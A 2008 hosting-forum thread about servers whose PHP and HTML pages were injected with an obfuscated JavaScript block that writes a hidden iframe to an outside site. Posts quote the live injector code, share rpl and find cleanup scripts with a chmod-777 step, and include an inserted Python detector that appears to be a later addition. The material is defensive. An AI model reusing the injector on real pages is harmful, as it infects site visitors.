  1. #1
    Member ManojB's Avatar
    Join Date
    Mar 2005
    Location
    pune
    Posts
    80

    Default Website Hacked.

    Hello,

    I am getting the following error message on my website:

    Parse error: syntax error, unexpected '<' in

    I have investigated and found that all my PHP pages contain the following tags:

    Code:
    <script>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result); </script>
    </body></html>
    It seems all my files have been corrupted, as I have manually removed these tags but still get the same problem. How can I overcome this problem? (suPHP has been disabled on my server.)
    Last edited by ManojB; 10-19-2008 at 10:42 PM.
    Regards,
    ManojB.

  2. #2
    Member
    Join Date
    Jan 2008
    Posts
    11

    Default

    Probably a virus on your computer causes this problem. You should run a virus scan on your own PC. This virus inserts this code into your web pages via FTP. The best solution is formatting and reinstalling Windows on your PC, changing your cPanel password and then manually cleaning out this code.

  3. #3
    Member
    Join Date
    May 2003
    Posts
    21

    Default

    This is a cPanel hack of some type. It is in all the domains, and this code is also within the /cpapachebuild/buildapache/mhash/ directories too. It is ALL over the place. The whole server is infected with this.

  4. #4
    Member ManojB's Avatar
    Join Date
    Mar 2005
    Location
    pune
    Posts
    80

    Default

    It seems it's a problem with the latest cPanel release, as my phpMyAdmin was also infected.
    Regards,
    ManojB.

  5. #5
    Member
    Join Date
    May 2003
    Posts
    21

    Default

    I spent almost 13 hours today figuring out a way to clean it up.

    Lots of Shell and SED scripting!

    Very frustrating.

  6. #6
    Member ManojB's Avatar
    Join Date
    Mar 2005
    Location
    pune
    Posts
    80

    Default

    Hello Oanielsen,

    Can you please let me know how you removed this from your files?
    Regards,
    ManojB.

  7. #7
    Member
    Join Date
    Aug 2002
    Posts
    1,120

    Default

    What was the ownership and permissions of the files that were infected?

    If the files were owned by root and had permissions of 0644, then you could be looking at a root-level compromise. If root has been compromised you need to do a full system restore.

  8. #8
    Registered User
    Join Date
    Nov 2003
    Location
    Floripa - Brazil
    Posts
    69

    Default

    Hi,
    I have the same problem; one server at LT was hacked (could it be because LT's database was hacked, again?).

    Anyone know how to strip the malicious tags?

    I found this script: http://forums.cpanel.net/showpost.ph...&postcount=241

    But what should be the regex to match this malicious code?

    Code:
    <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result); </script>
    </html> </body>

  9. #9
    Member
    Join Date
    May 2003
    Posts
    21

    Default

    All the servers we had compromised were at LT also. It was on servers we had never had a trouble ticket on, so it was not because of unencrypted e-mail. This was definitely a direct database hack on the part of LT. Make sure you change all your passwords on servers at LT ASAP.

    Here is the fix we used.

    1. Download and install RPL http://www.laffeycomputer.com/rpl.html
    2. There are 2 script files we had to create.
    The first script, which we named fixhack.sh, has the following code in it.
    Code:
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> </body>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    What that code does is run the RPL command for each of the lines you want to find, replacing the specified text with a NULL.

    The next shell script executes the previous script and recurses through all the directories. Each of these scripts we ran from the /home directory. Once you download RPL you will notice that it has a recursive option, but it will bring your server to its knees, so it is better to use this script to do the recursion for you. We named the following piece of code recursehack.sh

    Code:
    find /home -type d | while read DIRNAME
    do
        cd "$DIRNAME" || continue   # quote the path; skip a directory that cannot be entered instead of running fixhack.sh in the previous one
        /home/fixhack.sh
    done
    3. Make sure you CHMOD these scripts to 777
    4. Execute ./recursehack.sh from the /home directory
    5. We found that some of the things in the cPanel directories were also infected, so you need to run /scripts/upcp --force
    6. You will also find a new directory at the root of your server called something like "pons". Do an ls -ltr at the root of your server and you will see a new directory there. Within this directory is a file called "framer.htm", which is the code that was injected into each page, and another script file that did all the dirty work.

    Hope this helps someone else. It definitely kicked our *sses for a few hours.
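The regex asked for in #8, and the cleanup that #9 does with a fixed rpl string per line, written as one added Python script for this thread. It is not oanielsen's script and not anything from cPanel. The sample page is constructed for the example around the block quoted in #8; the regex keys on the injector's shape (the encoded string assigned to `source`, the `charCodeAt(i)-1` loop, `document.write`) rather than on one exact URL, so it also matches the variant in #1 whose string decodes to a different host. Each payload is decoded so the injected iframe URL can go into the incident notes, and every infected file is reported with its owner and mode, which is the check #7 asks for before deciding whether cleaning files is enough.

```python
"""Detect, decode and strip the obfuscated iframe injector discussed in this thread.

Added example for this thread, not the script posted in #9. The rpl calls there
match one exact string; the regular expression below matches any encoded string
of the same shape, and the payload is decoded for the incident record.
"""
from __future__ import annotations

import re
import stat
from pathlib import Path

# Sample infected file, constructed for this example. The injected block is the
# one quoted in post #8; the PHP and HTML around it are made up.
SAMPLE_PAGE = (
    '<?php include "config.php"; ?>\n'
    "<html><body><p>site content</p></body></html>\n"
    '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";\n'
    "for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);\n"
    "document.write(result); </script>\n"
    "</html> </body>\n"
)

# The injector's fingerprint: an encoded string assigned to `source`, a loop that
# shifts every character code down by one, and document.write(result). The
# encoded string is captured, not hard-coded, because it differs per server (the
# two variants in this thread decode to different URLs).
INJECT_RE = re.compile(
    r'(?:<html>\s*<body>)?\s*<script>\s*var source\s*=\s*"(?P<enc>[^"]*)";\s*var result\s*=\s*"";\s*'
    r'for\(var i=0;i<source\.length;i\+\+\)\s*result\+=String\.fromCharCode\(source\.charCodeAt\(i\)-1\);\s*'
    r'document\.write\(result\);\s*</script>\s*'
    # The reversed closing tags the injector appends. A page's own </body></html>
    # is in the correct order and is deliberately left alone.
    r'(?:</html>\s*</body>)?',
    re.DOTALL,
)

# The extensions the rpl calls in #9 covered.
CLEAN_SUFFIXES = {".php", ".html", ".htm", ".tpl"}


def decode_payload(enc: str) -> str:
    """Undo the charCodeAt(i)-1 obfuscation: shift every character down by one."""
    return "".join(chr(ord(c) - 1) for c in enc)


def find_injections(text: str) -> list[str]:
    """Return the decoded payload of every injected block found in `text`."""
    return [decode_payload(m.group("enc")) for m in INJECT_RE.finditer(text)]


def clean_page(text: str) -> tuple[str, list[str]]:
    """Strip every injected block; return (cleaned text, decoded payloads)."""
    payloads = find_injections(text)
    return INJECT_RE.sub("", text), payloads


def scan_tree(root: str, fix: bool = False) -> list[dict]:
    """Walk `root` and report infected files with owner uid and mode string.

    Root-owned 0644 files carrying the block point to a root-level compromise
    (post #7), where stripping the block is not a fix. With fix=True the block
    is removed from each infected file.
    """
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in CLEAN_SUFFIXES:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="surrogateescape")
        except OSError:
            continue
        cleaned, payloads = clean_page(text)
        if not payloads:
            continue
        st = path.stat()
        findings.append({
            "path": str(path),
            "uid": st.st_uid,
            "mode": stat.filemode(st.st_mode),
            "payloads": payloads,
        })
        if fix:
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return findings


if __name__ == "__main__":
    cleaned_text, found = clean_page(SAMPLE_PAGE)
    for payload in found:
        print("injected:", payload)
    print(cleaned_text)
```

Run `scan_tree("/home")` first without `fix=True` and read the owner and mode columns before cleaning anything: a list of root-owned files is the signal #7 and #14 describe, and at that point the answer is an OS reload and restore from backup, not a cleanup pass.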

  10. #10
    Registered User
    Join Date
    Nov 2003
    Location
    Floripa - Brazil
    Posts
    69

    Default

    oanielsen,

    thank you very much for sharing this script....
    I'll run this right now.

    Our problem was exactly the same; root had the "pons" folder with the same content.

    I'll move my servers from LT ASAP. This kind of trouble doesn't justify the raised prices :-(

  11. #11
    Member
    Join Date
    Sep 2004
    Location
    inside a catfish
    Posts
    963
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    Who is LT?

  12. #12
    Registered User
    Join Date
    Nov 2003
    Location
    Floripa - Brazil
    Posts
    69

    Default

    Layeredtech.com

    Their database was hacked:

    http://www.webhostingtalk.com/showth...ht=layeredtech

  13. #13
    BND
    Registered User
    Join Date
    Nov 2008
    Posts
    1

    Exclamation

    How do I install this rpl? Please, urgently. My 300 sites were hacked.

  14. #14
    Member
    Join Date
    Jun 2006
    Posts
    65

    Default

    Quote Originally Posted by BND:
        How do I install this rpl? Please, urgently. My 300 sites were hacked.
    Suggest that you check first if your server is rooted. If it is, you need an OS reload and to recover all your sites from backup.
